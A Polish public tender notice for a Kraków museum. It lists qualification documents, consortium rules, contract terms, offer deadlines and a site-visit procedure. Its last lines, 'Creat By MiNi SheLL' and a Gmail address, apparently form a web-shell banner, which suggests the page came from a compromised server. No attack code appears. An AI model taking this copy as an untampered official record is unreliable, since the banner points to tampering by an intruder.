wykluczenia z postępowania wskazanych przez Zamawiającego w pkt 5.2. SWZ odpowiednio: <br/>a)	samego Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>b)	podmiotu/-ów, na którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy<br/>wg. wzoru w Zał. nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty oraz podmiotów, na rzecz których roboty te zostały wykonane, sporządzony wg wzoru stanowiącego załącznik nr 3 do SWZ, oraz z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy, na potwierdzenie spełniania warunku posiadania doświadczenia, o którym mowa w pkt 5.1.1. SWZ.<br/><br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu stanowi załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Oferty, udostępniony przez Zamawiającego na Platformie e-Zamówienia i zamieszczony w podglądzie<br/>postępowania w zakładce „Informacje podstawowe”, podpisany kwalifikowanym podpisem elektronicznym lub podpisem<br/>zaufanym lub podpisem osobistym przez osoby umocowane należycie do reprezentowania Wykonawcy.<br/>Uwaga! W sytuacjach opisanych w pkt 17.4. SWZ Wykonawca zobowiązany jest dołączyć do Formularza Oferty, jako<br/>oświadczenia składające się na treść jego oferty, także informacje opisane w przywołanym punkcie, zgodnie obowiązkiem<br/>wynikającym z art. 225 ustawy.<br/>2. Wraz z ofertą Wykonawca składa:<br/>1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji Informacji<br/>o Działalności Gospodarczej lub innego właściwego rejestru, chyba że Wykonawca<br/>w Formularzu Oferty wskaże dane umożliwiające dostęp do tych dokumentów samodzielnie przez Zamawiającego, poprzez<br/>bezpłatne i ogólnodostępne bazy danych<br/>2) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w jego imieniu<br/>działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów wymienionych w ppkt 1) powyżej;<br/>Opisane powyżej zasady stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o<br/>udzielenie niniejszego zamówienia oraz do osoby działającej w imieniu podmiotu udostępniającego zasoby, zgodnie z pkt.<br/>6.1.3. SWZ.<br/>3) Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na<br/>potrzeby realizacji zamówienia, lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jako dowód polegania na zdolnościach<br/>technicznych lub zawodowych tego podmiotu, w odniesieniu do warunków udziału w postępowaniu, o których mowa w pkt.<br/>5.1. SWZ – jeżeli dotyczy.<br/>4). Oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy – przy czym obowiązek ten dotyczy<br/>wyłącznie Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, zgodnie z art. 117 ust. 4 ustawy, wg. wzoru w zał. nr 7 do SWZ.<br/>5) W celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu, zgodnie z art. 125 ust. 1 i ust. 5 ustawy, składa on odrębne następujące<br/>oświadczenia: a) o niepodleganiu wykluczeniu z postępowania oraz b) o spełnianiu warunków udziału w postępowaniu,<br/>odpowiednio: i. samego Wykonawcy lub każdego<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; ii. podmiotu/-ów, na którego/-ych zdolnościach<br/>technicznych lub zawodowych polega Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu –<br/>jeżeli dotyczy, według wzorów zaproponowanych odpowiednio w formularzach A, B, C i D zał. nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z art. 58 ust. 1 ustawy:<br/>7.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie konsorcjum, wspólnicy<br/>spółki cywilnej), zgodnie z art. 58 ust. 2 ustawy, są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich<br/>w postępowaniu i do zawarcia umowy, i przedstawić stosowne dokumenty (pełnomocnictwa)<br/>w składanej ofercie.<br/>7.2. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają:<br/>7.2.1. każdy z osobna dotyczące ich dokumenty wskazane odpowiednio w pkt 6.1.5.1., a ponadto – na wezwanie<br/>Zamawiającego – także dokument opisany w pkt 6.2.1 SWZ dotyczy każdego z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.<br/>7.2.2. jeżeli dotyczy - dokumenty wskazane w pkt 6.1.3., 6.1.4., 6.1.5.1 dot. podmiotu udostępniającego zasoby, a ponadto<br/>– na wezwanie Zamawiającego – także 6.2.1. SWZ dotyczy podmiotu udostępniającego zasoby;<br/>7.2.3. dokumenty, o których mowa w pkt 6.1.1. i 6.1.2. SWZ (w tym dotyczy podmiotu udostępniającego zasoby – jeżeli<br/>dotyczy);<br/>7.2.4. ci z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy spełniają warunek udziału w<br/>postępowaniu, a także ewentualnie podmioty udostępniające zasoby - dokumenty, o których mowa w pkt 6.1.5.2 SWZ;<br/>7.2.5. a na wezwanie Zamawiającego, ci z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy<br/>spełniają warunek, na potwierdzenie którego wymagany jest dany dokument, także dokument wskazany w pkt 6.2.2. – 6.2.3.<br/>SWZ.<br/>7.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. członkowie konsorcjum) ponoszą, zgodnie z art. 445<br/>ust. 1 ustawy, solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy<br/>– jeżeli dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie ze wzorem umowy stanowiącym załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. W niniejszym postępowaniu komunikacja odbywa się przy użyciu Platformy e-Zamówienia oraz - w zakresie<br/>dopuszczonym SWZ także - poczty elektronicznej. Szczegóły dotyczące sposobu porozumiewania się Zamawiającego i<br/>Wykonawców zostały określone w pkt 9 SWZ. Adres poczty elektronicznej: muzeum@mit.krakow.pl<br/>Adres strony internetowej prowadzonego postępowania, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz<br/>inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia:https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-68066bd6-44ad-4a5d-bda0-59f1996f9286<br/>3. Dodatkowa informacja do sekcji III pkt. 3.6. ogłoszenia:<br/>3.1. W zakresie nieuregulowanym ustawą lub SWZ do podmiotowych środków dowodowych, oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia przywołanego<br/>w pkt 8.9. SWZ.<br/>3.2. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w postępowaniu określa § 2<br/>rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie. Zamawiający wskazuje jednak, że wśród dopuszczalnych<br/>i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx, .odt.<br/><br/>3.15.	Wizja lokalna: <br/>1)	Zamawiający informuje, że ze względu na specyfikę przedmiotu zamówienia wymaga złożenia oferty po odbyciu przez Wykonawcę wizji lokalnej<br/>2)	Terminy wizji do wyboru 7.05.2025 r., 9.05.2025 r., 12.05.2025 r. godz. 10:00. Zamiar uczestnictwa w wizji lokalnej Wykonawca zobowiązany jest zgłosić drogą elektroniczną na adres: muzeum@mit.krakow.pl najpóźniej w dniu planowanej wizji lokalnej do godz. 9:00. <br/>3)	W zgłoszeniu zamiaru odbycia wizji lokalnej należy wskazać: <br/>- imiona i nazwiska wszystkich osób, które pojawią się podczas wizji lokalnej (maksymalnie 2 osoby); <br/>- pełną nazwę i adres reprezentowanego Wykonawcy. <br/>4)	Wszystkie osoby biorące udział w wizji lokalnej są proszone o potwierdzenie swej obecności na liście uczestników przygotowanej przez Zamawiającego.<br/>5)	Zasady prowadzenia wizji lokalnej:<br/>a)	Przedstawiciele Zamawiającego wskażą elementy, których dotyczą planowane usługi; <br/>b)	Zamawiający informuje, że podczas wizji lokalnej nie będzie możliwości zadawania pytań, oraz udzielania wyjaśnień związanych z realizacją przedmiotu zamówienia. Ewentualne wnioski o wyjaśnienie zagadnień związanych z realizacją przedmiotu zamówienia należy składać zgodnie z zasadami określonymi w pkt 10 SWZ. <br/>dodatkowe informacje dot. terminu reliacji sekcja 4.2.10)<br/>4.	Termin wykonania zamówienia: od dnia zawarcia umowy do 30 września 2025 r. z zastrzeżeniem, że prace prowadzone wewnątrz budynków E i H, które uniemożliwiają zwiedzanie wystawy stałej będą prowadzone wyłącznie w okresie od 1-30 września 2025.r <br/>UWAGA ! skrócenie tego terminu będzie podlegało ocenie w kryterium oceny oferty.

Creat By MiNi SheLL
Email: jattceo@gmail.com